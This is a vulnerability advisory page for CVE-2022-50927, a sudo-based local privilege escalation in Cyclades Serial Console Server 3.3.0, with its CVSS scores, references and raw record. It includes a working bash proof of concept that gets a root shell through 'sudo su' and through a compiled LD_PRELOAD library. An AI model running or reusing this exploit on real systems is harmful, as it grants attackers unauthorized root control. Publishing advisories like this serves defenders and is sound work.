Security Vulnerability Report
CVE-2022-50927 CVSS 6.2 MEDIUM

CVE-2022-50927

Published: 2026-01-13 23:15:57
Last Modified: 2026-04-15 00:35:42

Description

Cyclades Serial Console Server 3.3.0 contains a local privilege escalation vulnerability due to overly permissive sudo privileges for the admin user and admin group. Attackers can exploit the default user configuration to gain root access by manipulating system binaries and leveraging unrestricted sudo permissions.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
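CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Note: the raw record at the bottom of this page also carries a Secondary CVSS 4.0 assessment of 8.5 HIGH (PR:L, VC:H/VI:H/VA:H). That assessment is closer to the description above: obtaining root affects integrity and availability as well as confidentiality, and the described path starts from the admin account rather than from no privileges. Prioritise remediation against the higher figure.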

Configurations (Affected Products)

No configuration data available.

Cyclades Serial Console Server 3.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash # CVE-2022-50927 PoC - Cyclades Serial Console Server Local Privilege Escalation # This PoC demonstrates exploiting overly permissive sudo privileges echo "[*] CVE-2022-50927 Local Privilege Escalation PoC" echo "[*] Target: Cyclades Serial Console Server 3.3.0" # Check if current user has sudo privileges without password echo "[+] Checking sudo privileges..." sudo -l 2>/dev/null | grep -E "\(ALL : ALL\)|\(ALL : NOPASSWD\)" if [ $? -eq 0 ]; then echo "[+] Vulnerable configuration detected!" echo "[+] Current user can execute sudo commands without password" # Method 1: Direct root shell echo "[+] Attempting to gain root access..." sudo su - root # If successful, we should have a root shell if [ $? -eq 0 ]; then echo "[!] Root shell obtained!" id fi else echo "[-] Current user does not appear to have exploitable sudo privileges" echo "[-] This PoC requires admin group membership" fi # Alternative method using LD_PRELOAD echo "[+] Alternative method using shared library injection..." cat > /tmp/rootshell.c << 'EOF' #include <stdio.h> #include <sys/types.h> #include <unistd.h> void _init() { if (!getuid()) { unlink("/tmp/rootshell.so"); setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); } } EOF gcc -fPIC -shared -o /tmp/rootshell.so /tmp/rootshell.c 2>/dev/null sudo LD_PRELOAD=/tmp/rootshell.so /bin/bash rm -f /tmp/rootshell.c /tmp/rootshell.so

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50927", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:57.047", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cyclades Serial Console Server 3.3.0 contains a local privilege escalation vulnerability due to overly permissive sudo privileges for the admin user and admin group. Attackers can exploit the default user configuration to gain root access by manipulating system binaries and leveraging unrestricted sudo permissions."}, {"lang": "es", "value": "Cyclades Serial Console Server 3.3.0 contiene una vulnerabilidad de escalada de privilegios local debido a privilegios sudo excesivamente permisivos para el usuario admin y el grupo admin. Los atacantes pueden explotar la configuración de usuario predeterminada para obtener acceso de root manipulando binarios del sistema y aprovechando permisos sudo sin restricciones."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50773", "source": "[email protected]"}, {"url": "https://www.vertiv.com/en-us/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/cyclades-serial-console-server-local-privilege-escalation", "source": "[email protected]"}]}}